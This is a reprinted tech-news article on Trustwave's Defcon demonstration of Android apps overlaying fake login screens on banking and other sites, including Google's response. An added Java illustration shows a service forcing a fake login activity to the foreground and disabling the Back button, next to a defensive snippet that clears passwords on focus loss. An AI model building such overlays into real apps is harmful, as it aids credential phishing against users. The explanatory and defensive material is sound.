A design weakness in Google's Android mobile OS could make it easy for criminals to launch phishing attacks to steal passwords, researchers said.
According to security firm Trustwave, the flaw lets an app developer put a fake login page on top of the genuine one while the user is on a banking site.
It said the weakness stems from Android letting an application push itself to the front of the active processes, rather than having to post a notification bar alert and wait for the user to switch to it. The same design could also be used for advertising pop-ups, Trustwave said.
"Because of that, the app is able to steal the focus and you're not able to hit the back button to exit out," Nicholas Percoco, senior vice president and head of SpiderLabs at Trustwave, told CNet.
Trustwave, as part of a presentation at the Defcon hacking conference, showed off a proof of concept that targeted Facebook, Amazon and Google passwords, in which a fake screen replaced the genuine login screen, something that could easily catch users off guard.
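To make the design point concrete, here is an added illustration in Android Java. It was written for this edit; it is not Trustwave's proof of concept, and `ForegroundGrabService`, `FakeLoginActivity`, `LoginActivity` and the other names are hypothetical. A background `Service` can either post a notification and let the user decide when to switch, or call `startActivity()` and take the foreground immediately; the second path is the capability the article describes, and the fake activity swallowing the back button matches Percoco's description. `LoginActivity` shows what the covered app can and cannot do: it cannot refuse to be covered, but it does see `onPause()` and `onWindowFocusChanged(false)`, so it can at least clear any partly typed password and treat the loss of focus as an event worth logging.

```java
import android.app.Activity;
import android.app.Notification;
import android.app.NotificationManager;
import android.app.PendingIntent;
import android.app.Service;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.os.IBinder;
import android.util.Log;
import android.widget.EditText;

/** Hypothetical third-party app component (illustration only, not the original research code). */
class ForegroundGrabService extends Service {
    private static final int NOTE_ID = 1;

    @Override
    public IBinder onBind(Intent intent) { return null; }

    /** Polite path: a notification bar alert. The user chooses if and when to open the screen. */
    void alertViaNotification(Context ctx) {
        Intent open = new Intent(ctx, FakeLoginActivity.class);
        PendingIntent pi = PendingIntent.getActivity(ctx, 0, open, PendingIntent.FLAG_UPDATE_CURRENT);
        Notification n = new Notification.Builder(ctx)
                .setSmallIcon(android.R.drawable.ic_dialog_info)
                .setContentTitle("Session expired")
                .setContentText("Tap to sign in again")
                .setContentIntent(pi)
                .build();                                   // Notification.Builder.build() needs API 16+
        ((NotificationManager) ctx.getSystemService(Context.NOTIFICATION_SERVICE)).notify(NOTE_ID, n);
    }

    /** Focus-stealing path the article describes: the activity is pushed in front of
     *  whatever the user is looking at, with no user action and no special permission. */
    void grabForeground(Context ctx) {
        Intent open = new Intent(ctx, FakeLoginActivity.class);
        open.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);       // required when starting from a non-Activity context
        ctx.startActivity(open);
    }
}

/** The screen pushed to the front. Swallowing Back is what keeps the user from backing out of it. */
class FakeLoginActivity extends Activity {
    @Override
    protected void onCreate(Bundle saved) {
        super.onCreate(saved);
        setContentView(new EditText(this));                 // stands in for a copied login form
    }

    @Override
    public void onBackPressed() {
        // Deliberately do nothing: the user cannot hit Back to exit.
    }
}

/** The covered app's side (added here): it cannot block being covered, but it is told when it happens. */
class LoginActivity extends Activity {
    private static final String TAG = "LoginActivity";
    private EditText password;

    @Override
    protected void onCreate(Bundle saved) {
        super.onCreate(saved);
        password = new EditText(this);
        setContentView(password);
    }

    /** Called with false as soon as another window takes the foreground. */
    @Override
    public void onWindowFocusChanged(boolean hasFocus) {
        super.onWindowFocusChanged(hasFocus);
        if (!hasFocus) {
            Log.w(TAG, "login screen lost window focus; clearing password field");
            password.getText().clear();
        }
    }

    /** Also reached when another activity is started on top of this one. */
    @Override
    protected void onPause() {
        password.getText().clear();
        super.onPause();
    }
}
```

Both the service and the activities would need the usual `<service>` and `<activity>` entries in the app manifest; nothing in `grabForeground()` requires a permission the user is asked to approve, which is the point the article makes about the design. The defensive half is a mitigation for a half-filled form, not a fix: an app has no way to stop another app's activity from being started on top of it.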
Google said the behaviour wasn't a flaw at all but part of Android's multitasking capabilities, although Trustwave claimed the company had told it that it was looking into the issue.
"Switching between applications is a desired capability used by many applications to encourage rich interaction between applications," Google said in a statement sent to CNet.
"We haven't seen any apps maliciously using this technique on Android Market and we will remove any apps that do."
However, Trustwave said waiting for an app to be reported before removing it was a “dangerous” stance.
This article originally appeared at pcpro.co.uk
Copyright © PC Pro, Dennis Publishing
Issue: 316 | July 2013